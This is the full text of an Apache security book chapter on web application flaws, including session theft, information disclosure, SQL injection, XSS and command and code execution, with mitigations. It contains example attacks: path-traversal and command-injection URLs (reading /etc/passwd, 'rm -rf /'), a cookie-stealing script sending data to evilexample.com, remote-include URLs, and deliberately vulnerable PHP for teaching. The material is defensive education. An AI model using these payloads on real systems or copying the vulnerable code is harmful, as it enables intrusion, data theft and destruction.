> Apache Security: Chapter 10. Web Application Security


Contents
Previous
Next

10 Web Application Security

This chapter covers web application security on a level that is appropriate for the profile of this book. That’s not an easy task: I’ve tried to adequately but succinctly cover all relevant points, without delving into programming too much.

To compensate for the lack of detail in some spots, I have provided a large collection of web application security links. In many cases the links point to security papers that were the first to introduce the problem, thereby expanding the web application security book of knowledge.

Unless you are a programmer, you will not need to concern yourself with every possible detail presented in this chapter. The idea is to grasp the main concepts and to be able to spot major flaws at a first glance. As is typical with the 20/80 rule: invest 20 percent of your effort to get 80 percent of the desired results.

The reason web application security is difficult is because a web application typically consists of many very different components glued together. A typical web application architecture is illustrated in Figure 10-1. In this figure, I have marked the locations where some frequent flaws and attacks occur.

Figure 10-1. Typical web application architecture

Typical web application architecture

To build secure applications developers must be well acquainted with individual components. In today’s world, where everything needs to be completed yesterday, security is often an afterthought. Other factors have contributed to the problem as well:

Security issues should be addressed at the beginning of web application development and throughout the development lifecycle. Every development team should have a security specialist on board. The specialist should be the one to educate other team members, spread awareness, and ensure there are no security lapses. Unfortunately this is often not possible in real life.

If you are a system administrator, you may be faced with a challenge to deploy and maintain systems of unknown quality. Even under the best of circumstances, when enough time is allocated to handle security issues, inevitable mistakes will cause security problems. Except for the small number of issues that are configuration errors, you can do little on the Apache level to remedy the problems discussed in this chapter. The bulk of your efforts should go toward creating a robust and defensible environment, which is firmly under your control. Other than that, focus on discovering the application flaws and the attacks that are carried out against them. (You can do this by following the practices described in Chapter 12, which discusses web intrusion detection and prevention.)

In this chapter, I cover the following:

HTTP is a stateless protocol. It was never designed to handle sessions. Though this helped the Web take off, it presents a major problem for web application designers. No one anticipated the Web being used as an application platform. It would have been much better to have session management built right into the HTTP standard. But since it wasn’t, it is now re-implemented by every application separately. Cookies were designed to help with sessions but they fall short of finishing the job.

Cookies are a mechanism for web servers and web applications to remember some information about a client. Prior to their invention, there was no way to uniquely identify a client. The only other piece of information that can be used for identification is the IP address. Workstations on local networks often have static, routable IP addresses that rarely change. These addresses can be used for pretty reliable user tracking. But in most other situations, there are too many unknowns to use IP addresses for identification:

Something had to be done to identify users. With stateful protocols, you at least know the address of the client throughout the session. To solve the problem for stateless protocols, people at Netscape invented cookies. Perhaps Netscape engineers thought about fortune cookies when they thought of the name. Here is how they work:

There are two types of cookies:

Cookies are transported using HTTP headers. Web servers send cookies in a Set-Cookie header. Clients return them in a Cookie header. Newer versions of the standard introduce the names Set-Cookie2 and Cookie2.

Clients normally send cookies back only to the servers where they originated, or servers that share the same domain name (and are thus assumed to be part of the same network).

To avoid DoS attacks by rogue web servers against browsers, some limits are imposed by the cookie specification (for example, the maximum length is limited and so is the total number of cookies).

Further information on cookies is available from:

There are three ways to implement sessions:

Cookies are by far the simplest mechanism to implement sessions and should always be used as a first choice. The other two mechanisms should be used as alternatives in cases where the user’s application does not support cookies (or the user does not accept cookies).

Attacks against session management are popular because of the high possible gain. Once an attacker learns a session token, he gets instant access to the application with the privileges of the user whose session token he stole.

There are many ways to attempt to steal session tokens:

Communication interception

When the communication channel is not secure, then no information is safe, session tokens included. The danger of someone tapping into the local traffic to retrieve session tokens is likely when applications are used internally and there is a large concentration of users on the same LAN.

Involuntary token leak

URL-based session management techniques are vulnerable in many ways. Someone looking over a shoulder could memorize or write down the session token and then resume the session from somewhere else.

Voluntary token leak

Another issue with URL-based session management techniques is that session tokens can leak. Sometimes users themselves do it by copying a page URL into an email or to a message board.

Token leak through the Referer request header

As you may be aware, the Referer request header field contains the URL of the page from which a link was followed to the current page. If that URL contains a session token and the user is making a jump to another (likely untrusted) site, the administrator of that web site will be able to strip the session token from access logs. Direct all external links to go through an intermediary internal script to prevent tokens from leaking this way.

Session fixation

Session tokens are created when they do not exist. But it is also possible for an attacker to create a session first and then send someone else a link with the session token embedded in it. The second person would assume the session, possibly performing authentication to establish trust, with the attacker knowing the session token all along. For more information, read the paper by Mitja Kolsek, of ACROS Security, entitled “Session Fixation Vulnerability in Web-based Applications“ (http://www.acros.si/papers/session_fixation.pdf).

Cross-site scripting attacks

Cross-site scripting attacks (XSS) are the favorite methods of stealing a session token from a client. By injecting a small piece of code into the victim’s browser, the session token can be delivered to the attacker. (XSS attacks are explained in the Section 10.6.2 later in this chapter.)

To conclude the discussion about session management, here are some best practices to demonstrate that a robust scheme requires serious thinking:

An excellent overview of the problems of session management is available in the following paper:

“Web Based Session Management: Best practices in managing HTTP Based Client Sessions“ by Gunter Ollmann (http://www.technicalinfo.net/papers/WebBasedSessionManagement.html)

Though attacks on clients are largely irrelevant for web application security (the exception being the use of JavaScript to steal session tokens), we will cover them briefly from the point of view that if you are in charge of a web application deployment, you must cover all attack vectors.

Phishing is a shorter version of the term password fishing. It is used for attacks that try to trick users into submitting passwords and other sensitive private information to the attacker by posing as someone else. The process goes like this:

Now think of your precious web application; could your users become victims of a scam like this? If you think the chances are high, do the following:

Phishing is a real problem, and very difficult to solve. One solution may be to deploy SSL with client certificates required (or using any other Type 2 authentication method, where users must have something with them to use for authentication). This will not prevent users from disclosing their credentials but will prevent the attacker from using them to access the site because the attacker will be missing the appropriate certificate. Unfortunately, client certificates are difficult to use, so this solution only works for smaller applications and closely controlled user groups. A proper solution is yet to be determined but may revolve around the following ideas:

No quick remedies will be created for the phishing problem, since none of the ideas will be easy to implement. The following resources are useful if you want to learn more about this subject:

  • Anti-Phishing Working Group (http://www.antiphishing.org)

  • “The Phishing Guide” by Gunter Ollmann (NGS) (http://www.nextgenss.com/papers/NISR-WP-Phishing.pdf)

Application logic flaws are the result of a lack of understanding of the web application programming model. Programmers are often deceived when something looks right and they believe it works right too. Most flaws can be tracked down to two basic errors:

I explain the errors and the flaws resulting from them through a series of examples.

Information stored in cookies and hidden form fields is not visible to the naked eye. However, it can be accessed easily by viewing the web page source (in the case of hidden fields) or configuring the browser to display cookies as they arrive. Browsers in general do not allow anyone to change this information, but it can be done with proper tools. (Paros, described in the Appendix A, is one such tool.)

Because browsers do not allow anyone to change cookie information, some programmers use cookies to store sensitive information (application data). They send cookies to the client, accept them back, and then use the application data from the cookie in the application. However, the data has already been tainted.

Imagine an application that uses cookies to authenticate user sessions. Upon successful authentication, the application sends the following cookie to the client (I have emphasized the application data):

Set-Cookie: authenticated=true; path=/; domain=www.example.com

The application assumes that whoever has a cookie named authenticated containing true is an authenticated user. With such a concept of security, the attacker only needs to forge a cookie with the same content and access the application without knowing the username or the password.

It is a similar story with hidden fields. When there is a need in the application to perform a two-step process, programmers will often perform half of the processing in the first step, display step one results to the user in a page, and transmit some internal data into the second step using hidden fields. Though browsers provide no means for users to change the hidden fields, specialized tools can. The correct approach is to use the early steps only to collect and validate data and then repeat validation and perform the main task in the final step.

Allowing users to interfere with application internal data often results in attackers being able to do the following:

An example of this type of flaw can be found in numerous form-to-email scripts. To enable web designers to have data sent to email without a need to do any programming, all data is stored as hidden form fields:

<form action="/cgi-bin/FormMail" method="POST">
<input type="hidden" name="subject" value="Call me back">
<input type="hidden" name="recipient" value="sales@example.com">
<!-- the visible part of the form follows here -->
</form>

As was the case with cookies, the recipient field can be manipulated to send email to any email address. Spammers were quick to exploit this type of fault, using form-to-email scripts to send unsolicited email messages.

Many form-to-email scripts still work this way but have been improved to send email only to certain domains, making them useless to spammers.

The referrer field is a special header field added to each request by HTTP clients (browsers). Not having been created by the server, its contents cannot be trusted. But a common mistake is to rely on the referrer field for security.

Early versions of many form-to-email scripts did that. They checked the Referer request field (also known as HTTP_REFERER) and refused to work when the contents did not contain a proper address. This type of check has value. Because browsers populate the referrer field correctly, it becomes impossible to use the form-to-email script from another web site. However, it does not protect against spammers, who can programmatically create HTTP requests.

The more bad guys know about your system, the easier it becomes to find a way to compromise it. Information disclosure refers to the family of flaws that reveal inside information.

A directory listing is a dynamically generated page showing the contents of a requested folder. Web servers creating such listings are only trying to be helpful, and they usually do so only after realizing the default index file (index.html, index.php, etc.) is absent. Directory listings are sometimes served to the client even when a default index file exists, as a result of web server vulnerability. This happens to be one of the most frequent Apache problems, as you can see from the following list of releases and their directory listing vulnerabilities. (The Common Vulnerability and Exposure numbers are inside the parentheses; see http://cve.mitre.org.)

A directory-listing service is not needed in most cases and should be turned off. Having a web server configured to produce directory listings where they are not required should be treated as a configuration error.

The problem with directory listings is in what they show, coupled with how people behave:

In the worst-case scenario, a folder used exclusively to store files for download (some of which are private) will be left without a default file. The attacker only needs to enter the URL of the folder to gain access to the full list of files. Turning directory listings off (using Options -Indexes, as shown in Chapter 2) is essential, but it is not a complete solution, as you will see soon.

Web Distributed Authoring and Versioning (WebDAV), defined at http://www.ietf.org/rfc/rfc2518.txt, is an extension of the HTTP protocol. It consists of several new request methods that are added on top of HTTP to allow functionality such as search (for files), copy, and delete. Left enabled on a web site, WebDAV will allow anyone to enumerate files on the site, even with all directory indexes in place or directory listings turned off.

What follows is a shortened response from using telnet to connect to a web site that contains only three files (the root folder counts as one) and then sending the PROPFIND request (new with WebDAV) asking for the contents of the web server root folder. Users browsing normally would get served index.html as the home page but you can see how WebDAV reveals the existence of the file secret.data. I have emphasized the parts of the output that reveal the filenames.

$ telnet ivanristic.com 8080
Trying 217.160.182.153...
Connected to ivanristic.com.
Escape character is '^]'.
PROPFIND / HTTP/1.0
Depth: 1
   
HTTP/1.1 207 Multi-Status
Date: Sat, 22 May 2004 19:21:32 GMT
Server: Apache/2.0.49 (Unix) DAV/2 PHP/4.3.4
Connection: close
Content-Type: text/xml; charset="utf-8"
   
<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>/</D:href>
<D:propstat>
<D:prop>
...
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>/secret.data</D:href>
<D:propstat>
<D:prop>
...
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>/index.html</D:href>
<D:propstat>
<D:prop>
...
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>

Information disclosure through WebDAV is a configuration error (WebDAV should never be enabled for the general public). I mention it here because the consequences are similar to those of providing unrestricted directory listings. Some Linux distributions used to ship with WebDAV enabled by default, resulting in many sites unwillingly exposing their file listings to the public.

“Secure by default” is not a concept appreciated by many application server vendors who deliver application servers in developer-friendly mode where each error results in a detailed message being displayed in the browser. Administrators are supposed to change the configuration before deployment but they often do not do so.

This behavior discloses a lot of information that would otherwise be invisible to an attacker. It allows attackers to detect other flaws (e.g., configuration flaws) and to learn where files are stored on the filesystem, leading to successful exploitation.

A correct strategy to deal with this problem is as follows. (See Chapter 2 for technical details.)

  1. Configure server software (web server, application server, etc.) such that it does not display verbose error messages to end users and instead logs them into a log file.

  2. Instruct developers to do the same for the applications and have applications respond with HTTP status 500 whenever an error occurs.

  3. Install custom error pages using the Apache ErrorDocument directive.

If all else fails (you have to live with an application that behaves incorrectly and you cannot change it), a workaround is possible with Apache 2 and mod_security. Using output filtering (described in Chapter 12), error messages can be detected and replaced with less dangerous content before the response is delivered to the client.

Programmers often need a lot of information from an application to troubleshoot problems. This information is often presented at the bottom of each page when the application is being executed in debug mode. The information displayed includes:

The effect of all this being disclosed to someone other than a developer can be devastating. The key question is, how is an application getting into debug mode?

My recommendation is to have the debug mode turned off completely for production systems (and when I say turned off, I mean commented out of the source code).

Alternatively, a special request parameter (password-protected) can be used as an indicator that debug mode is needed, but the information would be dumped to a place (such as a log file) where only a developer can access it.

File disclosure refers to the case when someone manages to download a file that would otherwise remain hidden or require special authorization.

Under ideal circumstances, files will be downloaded directly using the web server. But when a nontrivial authorization scheme is needed, the download takes place through a script after the authorization. Such scripts are web application security hot spots. Failure to validate input in such a script can result in arbitrary file disclosure.

Imagine a set of pages that implement a download center. Download happens through a script called download.php, which accepts the name of the file to be downloaded in a parameter called filename. A careless programmer may form the name of the file by appending the filename to the base directory:

$file_path = $repository_path + "/" + $filename;

An attacker can use the path traversal attack to request any file on the web server:

http://www.example.com/download.php?filename=../../etc/passwd

You can see how I have applied the same principle as before, when I showed attacking the web server directly. A naïve programmer will not bother with the repository path, and will accept a full file path in the parameter, as in:

http://www.example.com/download.php?filename=/etc/passwd

A file can also be disclosed to an attacker through a vulnerable script that uses a request parameter in an include statement:

include($file_path);

PHP will attempt to run the code (making this flaw more dangerous, as I will discuss later in the section “Code Execution”), but if there is no PHP code in the file it will output the contents of the file to the browser.

Source code disclosure usually happens when a web server is tricked into displaying a script instead of executing it. A popular way of doing this is to modify the URL enough to confuse the web server (and prevent it from determining the MIME type of the file) and simultaneously keep the URL similar enough to the original to allow the operating system to find it. This will become clearer after a few examples.

URL-encoding some characters in the request used to cause Tomcat and WebLogic to display the specified script file instead of executing it (see http://www.securityfocus.com/bid/2527). In the following example, the letter p in the extension .jsp is URL-encoded:

http://www.example.com/index.js%70

Appending a URL-encoded null byte to the end of a request used to cause JBoss to reveal the source code (see http://www.securityfocus.com/bid/7764).

http://www.example.com/web-console/ServerInfo.jsp%00

Many web servers used to get confused by the mere use of uppercase letters in the file extension (an attack effective only on platforms with case-insensitive filesystems):

http://www.example.com/index.JSP

Another way to get to the source code is to exploit a badly written script that is supposed to allow selective access to source code. At one point, Internet Information Server shipped with such a script enabled by default (see http://www.securityfocus.com/bid/167). The script was supposed to show source code to the example programs only, but because programmers did not bother to check which files were being requested, anyone was able to use the script to read any file on the system. Requesting the following URL, for example, returned the contents of the boot.ini file from the root of the C: drive:

http://www.sitename.com/msadc/Samples/SELECTOR/showcode.asp?source=
/msadc/Samples/../../../../../boot.ini

Most of the vulnerabilities are old because I chose to reference the popular servers to make the examples more interesting. You will find that new web servers almost always suffer from these same problems.

You have turned directory listings off and you feel better now? Guessing filenames is sometimes easy:

Temporary files

If you need to perform a quick test on the web server, chances are you will name the file according to the test you wish to make. Names like upload.php, test.php, and phpinfo.php are common (the extensions are given for PHP but the same logic applies to other environments).

Renamed files

Old files may be left on the server with names such as index2.html, index.old.html, or index.html.old.

Application-generated files

Web authoring applications often generate files that find their way to the server. (Of course, some are meant to be on the server.) A good example is a popular FTP client, WS_FTP. It places a log file into each folder it transfers to the web server. Since people often transfer folders in bulk, the log files themselves are transferred, exposing file paths and allowing the attacker to enumerate all files. Another example is CityDesk, which places a list of all files in the root folder of the site in a file named citydesk.xml. Macromedia’s Dreamweaver and Contribute have many publicly available files.

Configuration management files

Configuration management tools create many files with metadata. Again, these files are frequently transferred to the web site. CVS, the most popular configuration management tool, keeps its files in a special folder named CVS. This folder is created as a subfolder of every user-created folder, and it contains the files Entries, Repository, and Root.

Backup files

Text editors often create backup files. When changes are performed directly on the server, backup files remain there. Even when created on a development server or workstation, by the virtue of bulk folder FTP transfer, they end up on the production server. Backup files have extensions such as ~, .bak, .old, .bkp, .swp.

Exposed application files

Script-based applications often consist of files not meant to be accessed directly from the web server but instead used as libraries or subroutines. Exposure happens if these files have extensions that are not recognized by the web server as a script. Instead of executing the script, the server sends the full source code in response. With access to the source code, the attacker can look for security-related bugs. Also, these files can sometimes be manipulated to circumvent application logic.

Publicly accessible user home folders

Sometimes user home directories are made available under the web server. As a consequence, command-line history can often be freely downloaded. To see some examples, type inurl:.bash_history into Google. (The use of search engines to perform reconnaissance is discussed in Chapter 11.)

Most downloads of files that should not be downloaded happen because web servers do not obey one of the fundamental principles of information security—i.e., they do not fail securely. If a file extension is not recognized, the server assumes it is a plain text file and sends it anyway. This is fundamentally wrong.

You can do two things to correct this. First, configure Apache to only serve requests that are expected in an application. One way to do this is to use mod_rewrite and file extensions.

# Reject requests with extensions we don't approve
RewriteCond %{SCRIPT_FILENAME} "!(\.html|\.php|\.gif|\.png|\.jpg)$"
RewriteRule .* - [forbidden]

Now even if someone uploads a spreadsheet document to the web server, no one will be able to see it because the mod_rewrite rules will block access. However, this approach will not protect files that have allowed extensions but should not be served. Using mod_rewrite, we can create a list of requests we are willing to accept and serve only those. Create a plain text file with the allowed requests listed:

# This file contains a list of requests we accept. Because
# of the way mod_rewrite works each line must contain two
# tokens, but the second token can be anything.
#
/ -
/index.php -
/news.php -
/contact.php -

Add the following fragment to the Apache configuration. (It is assumed the file you created was placed in /usr/local/apache/conf/allowed_urls.map.)

# Associate a name with a map stored in a file on disk
RewriteMap allowed_urls txt:/usr/local/apache/conf/allowed_urls.map
   
# Try to determine if the value of variable "$0" (populated with the
# request URI in this case) appears in the rewrite map we defined
# in the previous step. If there is a match the value of the
# "${allowed_urls:$0|notfound}" variable will be replaced with the
# second token in the map (always "-" in our case). In all other cases
# the variable will be replaced by the default value, the string that
# follows the pipe character in the variable - "notfound".
RewriteCond ${allowed_urls:$0|notfound} ^notfound$
   
# Reject the incoming request when the previous rewrite
# condition evaluates to true.
RewriteRule .* - [forbidden]

Finally, we reach a type of flaw that can cause serious damage. If you thought the flaws we have covered were mostly harmless you would be right. But those flaws were a preparation (in this book, and in successful compromise attempts) for what follows.

Injection flaws get their name because when they are used, malicious user-supplied data flows through the application, crosses system boundaries, and gets injected into another system component. System boundaries can be tricky because a text string that is harmless for PHP can turn into a dangerous weapon when it reaches a database.

Injection flaws come in as many flavors as there are component types. Three flaws are particularly important because practically every web application can be affected:

Other types of injection are also feasible. Papers covering LDAP injection and XPath injection are listed in the section Section 10.9.

SQL injection attacks are among the most common because nearly every web application uses a database to store and retrieve data. Injections are possible because applications typically use simple string concatenation to construct SQL queries, but fail to sanitize input data.

SQL injections are fun if you are not at the receiving end. We will use a complete programming example and examine how these attacks take place. We will use PHP and MySQL 4.x. You can download the code from the book web site, so do not type it.

Create a database with two tables and a few rows of data. The database represents an imaginary bank where my wife and I keep our money.

CREATE DATABASE sql_injection_test;
   
USE sql_injection_test;
   
CREATE TABLE customers (
    customerid INTEGER NOT NULL,
    username CHAR(32) NOT NULL,
    password CHAR(32) NOT NULL,
    PRIMARY KEY(customerid)
);
   
INSERT INTO customers ( customerid, username, password )
    VALUES ( 1, 'ivanr', 'secret' );
   
INSERT INTO customers ( customerid, username, password )
    VALUES ( 2, 'jelena', 'alsosecret' );
   
CREATE TABLE accounts (
    accountid INTEGER NOT NULL,
    customerid INTEGER NOT NULL,
    balance DECIMAL(9, 2) NOT NULL,
    PRIMARY KEY(accountid)
);
   
INSERT INTO accounts ( accountid, customerid, balance )
    VALUES ( 1, 1, 1000.00 );
   
INSERT INTO accounts ( accountid, customerid, balance )
    VALUES ( 2, 2, 2500.00 );

Create a PHP file named view_customer.php with the following code inside, and set the values of the variables at the top of the file as appropriate to enable the script to establish a connection to your database:

<?
   
$dbhost = "localhost";
$dbname = "sql_injection_test";
$dbuser = "root";
$dbpass = "";
   
// connect to the database engine
if (!mysql_connect($dbhost, $dbuser, $dbpass)) {
   die("Could not connect: " . mysql_error());
}
   
// select the database
if (!mysql_select_db($dbname)) {
   die("Failed to select database $dbname:" . mysql_error());
}
   
// construct and execute query
$query = "SELECT username FROM customers WHERE customerid = "
    . $_REQUEST["customerid"];
   
$result = mysql_query($query);
if (!$result) {
   die("Failed to execute query [$query]: " . mysql_error());
}
   
// show the result
while ($row = mysql_fetch_assoc($result)) {
    echo "USERNAME = " . $row["username"] . "<br>";
}
   
// close the connection
mysql_close();
   
?>

This script might be written by a programmer who does not know about SQL injection attacks. The script is designed to accept the customer ID as its only parameter (named customerid). Suppose you request a page using the following URL:

http://www.example.com/view_customer.php?customerid=1

The PHP script will retrieve the username of the customer (in this case, ivanr) and display it on the screen. All seems well, but what we have in the query in the PHP file is the worst-case SQL injection scenario. The customer ID supplied in a parameter becomes a part of the SQL query in a process of string concatenation. No checking is done to verify that the parameter is in the correct format. Using simple URL manipulation, the attacker can inject SQL commands directly into the database query, as in the following example:

http://www.example.com/view_customer.php?customerid=1%20OR%20customerid%3D2

If you specify the URL above, you will get two usernames displayed on the screen instead of a single one, which is what the programmer intended for the program to supply. Notice how we have URL-encoded some characters to put them into the URL, specifying %20 for the space character and %3D for an equals sign. These characters have special meanings when they are a part of a URL, so we had to hide them to make the URL work. After the URL is decoded and the specified customerid sent to the PHP program, this is what the query looks like (with the user-supplied data emphasized for clarity):

SELECT username FROM customers WHERE customerid = 1 OR customerid=2

This type of SQL injection is the worst-case scenario because the input data is expected to be an integer, and in that case many programmers neglect to validate the incoming value. Integers can go into an SQL query directly because they cannot cause a query to fail. This is because integers consist only of numbers, and numbers do not have a special meaning in SQL. Strings, unlike integers, can contain special characters (such as single quotation marks) so they have to be converted into a representation that will not confuse the database engine. This process is called escaping and is usually performed by preceding each special character with a backslash character. Imagine a query that retrieves the customer ID based on the username. The code might look like this:

$query = "SELECT customerid FROM customers WHERE username = '"
    . $_REQUEST["username"] . "'";

You can see that the data we supply goes into the query, surrounded by single quotation marks. That is, if your request looks like this:

http://www.example.com/view_customer.php?username=ivanr

The query becomes:

SELECT customerid FROM customers WHERE username = 'ivanr'

Appending malicious data to the page parameter as we did before will do little damage because whatever is surrounded by quotes will be treated by the database as a string and not a query. To change the query an attacker must terminate the string using a single quote, and only then continue with the query. Assuming the previous query construction, the following URL would perform an SQL injection:

http://www.example.com/view_customer.php?username=ivanr'%20OR
%20username%3D'jelena'--%20

By adding a single quote to the username parameter, we terminated the string and entered the query space. However, to make the query work, we added an SQL comment start (--) at the end, neutralizing the single quote appended at the end of the query in the code. The query becomes:

SELECT customerid FROM customers WHERE username = 'ivanr'
OR username='jelena'-- '

The query returns two customer IDs, rather than the one intended by the programmer. This type of attack is actually often more difficult to do than the attack in which single quotes were not used because some environments (PHP, for example) can be configured to automatically escape single quotes that appear in the input URL. That is, they may change a single quote (’) that appears in the input to \’, in which the backslash indicates that the single quote following it should be interpreted as the single quote character, not as a quote delimiting a string. Even programmers who are not very security-conscious will often escape single quotes because not doing so can lead to errors when an attempt is made to enter a name such as O'Connor into the application.

Though the examples so far included only the SELECT construct, INSERT and DELETE statements are equally vulnerable. The only way to avoid SQL injection problems is to avoid using simple string concatenation as a way to construct queries. A better (and safe) approach, is to use prepared statements. In this approach, a query template is given to the database, followed by the separate user data. The database will then construct the final query, ensuring no injection can take place.

Unlike other injection flaws, which occur when the programmer fails to sanitize data on input, cross-site scripting (XSS) attacks occur on the output. If the attack is successful, the attacker will control the HTML source code, emitting HTML markup and JavaScript code at will.

This attack occurs when data sent to a script in a parameter appears in the response. One way to exploit this vulnerability is to make a user click on what he thinks is an innocent link. The link then takes the user to a vulnerable page, but the parameters will spice the page content with malicious payload. As a result, malicious code will be executed in the security context of the browser.

Suppose a script contains an insecure PHP code fragment such as the following:

<? echo $_REQUEST["param"] ?>

It can be attacked with a URL similar to this one:

http://www.example.com/xss.php?param=<script>alert(document.location)</script>

The final page will contain the JavaScript code given to the script as a parameter. Opening such a page will result in a JavaScript pop-up box appearing on the screen (in this case displaying the contents of the document.location variable) though that is not what the original page author intended. This is a proof of concept you can use to test if a script is vulnerable to cross-site scripting attacks.

Email clients that support HTML and sites where users encounter content written by other users (often open communities such as message boards or web mail systems) are the most likely places for XSS attacks to occur. However, any web-based application is a potential target. My favorite example is the registration process most web sites require. If the registration form is vulnerable, the attack data will probably be permanently stored somewhere, most likely in the database. Whenever a request is made to see the attacker’s registration details (newly created user accounts may need to be approved manually for example), the attack data presented in a page will perform an attack. In effect, one carefully placed request can result in attacks being performed against many users over time.

XSS attacks can have some of the following consequences:

Deception

If attackers can control the HTML markup, they can make the page look any way they want. Since URLs are limited in size, they cannot be used directly to inject a lot of content. But there is enough space to inject a frame into the page and to point the frame to a server controlled by an attacker. A large injected frame can cover the content that would normally appear on the page (or push it outside the visible browser area). When a successful deception attack takes place, the user will see a trusted location in the location bar and read the content supplied by the attacker (a handy way of publishing false news on the Internet). This may lead to a successful phishing attack.

Collection of private user information

If an XSS attack is performed against a web site where users keep confidential information, a piece of JavaScript code can gain access to the displayed pages and forms and can collect the data and send it to a remote (evil) server.

Providing access to restricted web sites

Sometimes a user’s browser can go places the attacker’s browser cannot. This is often the case when the user is accessing a password-protected web site or accessing a web site where access is restricted based on an IP address.

Execution of malicious requests on behalf of the user

This is an extension from the previous point. Not only can the attacker access privileged information, but he can also perform requests without the user knowing. This can prove to be difficult in the case of an internal and well-guarded application, but a determined attacker can pull it off. This type of attack is a variation on XSS and is sometimes referred to as cross-site request forgery (CSRF). It’s a dangerous type of attack because, unlike XSS where the attacker must interact with the original application directly, CSRF attacks are carried out from the user’s IP address and the attacker becomes untraceable.

Client workstation takeover

Though most attention is given to XSS attacks that contain JavaScript code, XSS can be used to invoke other dangerous elements, such as Flash or Java programs or even ActiveX objects. Successful activation of an ActiveX object, for example, would allow the attacker to take full control over the workstation.

Compromising of the client

If the browser is not maintained and regularly patched, it may be possible for malicious code to compromise it. An unpatched browser is a flaw of its own, the XSS attack only helps to achieve the compromise.

Session token stealing

The most dangerous consequence of an XSS attack is having a session token stolen. (Session management mechanics were discussed earlier in this chapter.) A person with a stolen session token has as much power as the user the token belongs to. Imagine an e-commerce system that works with two classes of users: buyers and administrators. Anyone can be a buyer (the more the better) but only company employees can work as administrators. A cunning criminal may register with the site as a buyer and smuggle a fragment of JavaScript code in the registration details (in the name field, for example). Sooner or later (the attacker may place a small order to speed things up, especially if it is a smaller shop) one of the administrators will access her registration details, and the session token will be transmitted to the attacker. Notified about the token, the attacker will effortlessly log into the application as the administrator. If written well, the malicious code will be difficult to detect. It will probably be reused many times as the attacker explores the administration module.

In our first XSS example, we displayed the contents of the document.location variable in a dialog box. The value of the cookie is stored in document.cookie. To steal a cookie, you must be able to send the value somewhere else. An attacker can do that with the following code:

<script>document.write('<img src=http://www.evilexample.com/'
+ document.cookie>)</script>

If embedding of the JavaScript code proves to be too difficult because single quotes and double quotes are escaped, the attacker can always invoke the script remotely:

<script src=http://www.evilexample.com/script.js></script>

XSS attacks can be difficult to detect because most action takes place at the browser, and there are no traces at the server. Usually, only the initial attack can be found in server logs. If one can perform an XSS attack using a POST request, then nothing will be recorded in most cases, since few deployments record POST request bodies.

One way of mitigating XSS attacks is to turn off browser scripting capabilities. However, this may prove to be difficult for typical web applications because most rely heavily on client-side JavaScript. Internet Explorer supports a proprietary extension to the Cookie standard, called HttpOnly, which allows developers to mark cookies used for session management only. Such cookies cannot be accessed from JavaScript later. This enhancement, though not a complete solution, is an example of a small change that can result in large benefits. Unfortunately, only Internet Explorer supports this feature.

XSS attacks can be prevented by designing applications to properly validate input data and escape all output. Users should never be allowed to submit HTML markup to the application. But if you have to allow it, do not rely on simple text replacement operations and regular expressions to sanitize input. Instead, use a proper HTML parser to deconstruct input data, and then extract from it only the parts you know are safe.

Command execution attacks take place when the attacker succeeds in manipulating script parameters to execute arbitrary system commands. These problems occur when scripts execute external commands using input parameters to construct the command lines but fail to sanitize the input data.

Command executions are frequently found in Perl and PHP programs. These programming environments encourage programmers to reuse operating system binaries. For example, executing an operating system command in Perl (and PHP) is as easy as surrounding the command with backtick operators. Look at this sample PHP code:

$output = `ls -al /home/$username`;
echo $output;

This code is meant to display a list of files in a folder. If a semicolon is used in the input, it will mark the end of the first command, and the beginning of the second. The second command can be anything you want. The invocation:

http://www.example.com/view_user.php?username=ivanr;cat%20/etc/passwd

It will display the contents of the passwd file on the server.

Once the attacker compromises the server this way, he will have many opportunities to take advantage of it:

The most commonly used attack vector for command execution is mail sending in form-to-email scripts. These scripts are typically written in Perl. They are written to accept data from a POST request, construct the email message, and use sendmail to send it. A vulnerable code segment in Perl could look like this:

# send email to the user
open(MAIL, "|/usr/lib/sendmail $email");
print MAIL "Thank you for contacting us.\n";
close MAIL;

This code never checks whether the parameter $email contains only the email address. Since the value of the parameter is used directly on the command line an attacker could terminate the email address using a semicolon, and execute any other command on the system.

http://www.example.com/feedback.php?email=ivanr@webkreator.com;rm%20-rf%20/

Code execution is a variation of command execution. It refers to execution of the code (script) that runs in the web server rather than direct execution of operating system commands. The end result is the same because attackers will only use code execution to gain command execution, but the attack vector is different. If the attacker can upload a code fragment to the server (using FTP or file upload features of the application) and the vulnerable application contains an include( ) statement that can be manipulated, the statement can be used to execute the uploaded code. A vulnerable include() statement is usually similar to this:

include($_REQUEST["module"] . "/index.php");

Here is an example URL with which it can be used:

http://www.example.com/index.php?module=news

In this particular example, for the attack to work the attacker must be able to create a file called index.php anywhere on the server and then place the full path to it in the module parameter of the vulnerable script.

As discussed in Chapter 3, the allow_url_fopen feature of PHP is extremely dangerous and enabled by default. When it is used, any file operation in PHP will accept and use a URL as a filename. When used in combination with include(), PHP will download and execute a script from a remote server (!):

http://www.example.com/index.php?module=http://www.evilexample.com

Another feature, register_globals, can contribute to exploitation. Fortunately, this feature is disabled by default in recent PHP versions. I strongly advise you to keep it disabled. Even when the script is not using input data in the include() statement, it may use the value of some other variable to construct the path:

include($TEMPLATES . "/template.php");

With register_globals enabled, the attacker can possibly override the value of the $TEMPLATES variable, with the end result being the same:

http://www.example.com/index.php?TEMPLATES=http://www.evilexample.com

It’s even worse if the PHP code only uses a request parameter to locate the file, like in the following example:

include($parameter);

When the register_globals option is enabled in a request that is of multipart/form-data type (the type of the request is determined by the attacker so he can choose to have the one that suits him best), PHP will store the uploaded file somewhere on disk and put the full path to the temporary file into the variable $parameter. The attacker can upload the malicious script and execute it in one go. PHP will even delete the temporary file at the end of request processing and help the attacker hide his tracks!

Sometimes some other problems can lead to code execution on the server if someone manages to upload a PHP script through the FTP server and get it to execute in the web server. (See the www.apache.org compromise mentioned near the end of the “SQL Injection” section for an example.)

